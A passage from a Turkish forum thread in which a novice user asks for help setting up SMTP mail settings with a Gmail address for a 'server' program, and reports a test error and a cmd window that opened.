    abi benim gelişmiş ayarlarda benim stmp server ayarlarında kullan diyor onu ne demek istiyor anlamadım gmail adresim var şuan yeni actım oraya ne yazacam kardes bide yukarda mail problemine son demişşin orda biz bişe yapacagız mı yoksa stpm ayarlarını degiştirmemiz yeterli mi?? ya aslında ben yahoo dan yapsam daha iyi olacak olabilir mi acaba?? bide vatos nasıl indirecem msn sayfasına gidiyor:S ellerine saglık ya tesekkür ederim yardımcı olman bile yeter şu mail probleminede bi son verebilsem:S

  9. #9
    Dost scbobydoo - ait Kullanıcı Resmi (Avatar)
    Üyelik tarihi
    Dec 2008
    Mesajlar
    24

    Standart

    abicim biraz sorunlu birisiyimdir:S kafanı agrıttım ama server kuruyorum ama mail test diyorum scbobydoo@gmail.com internete baglı deilsiniz diyor anlamadım ya acaba nerde hata yapıorum diye benim stpm servere kullan yazıor oraya bişe yapmıyorum ondan olabilir mi acaba bana bi daha yardımcı olabilir misin

  10. #10
    Dost scbobydoo - ait Kullanıcı Resmi (Avatar)
    Üyelik tarihi
    Dec 2008
    Mesajlar
    24

    Standart

    abi servera kurdum bana cmd komutundan İNTERNET EXPLORER TARAYICISINI BAŞLAT diye bi siyah sayfa cıktı :S acaba benim pc de mi sorun var:S

+ Konu Cevaplama Paneli

Konu Bilgileri

Users Browsing this Thread

Şu an 1 kullanıcı var. (0 üye ve 1 konuk)

     

Benzer Konular

  1. Diz Üstü Bilgisayarın Kullanım Şekilleri
    By acizizfakiriz in forum Resim - Fotoğraf Galeri
    Cevaplar: 13
    Son Mesaj: 13.11.08, 22:46
  2. Ajan Temel
    By ibrahim_06 in forum Mizah
    Cevaplar: 1
    Son Mesaj: 20.09.08, 13:59
  3. Kullanım Talimatı
    By şakirt04 in forum Mizah
    Cevaplar: 13
    Son Mesaj: 07.08.08, 23:51
  4. 4 Ajan Diyarbakır'da Suçüstü Yakalandı
    By akıncı in forum Gündem
    Cevaplar: 2
    Son Mesaj: 15.05.08, 15:57
  5. Muhabbet Hissinin Kullanım Kılavuzu 2
    By acizizfakiriz in forum Risale-i Nur'dan Vecize ve Anekdotlar
    Cevaplar: 12
    Son Mesaj: 26.08.07, 09:58

Bu Konudaki Etiketler

Yetkileriniz

  • Konu Acma Yetkiniz Yok
  • Cevap Yazma Yetkiniz Yok
  • Eklenti Yükleme Yetkiniz Yok
  • Mesajınızı Değiştirme Yetkiniz Yok
Google Grupları
RisaleForum grubuna abone ol
E-posta:
Bu grubu ziyaret et

Search Engine Friendly URLs by vBSEO 3.6.0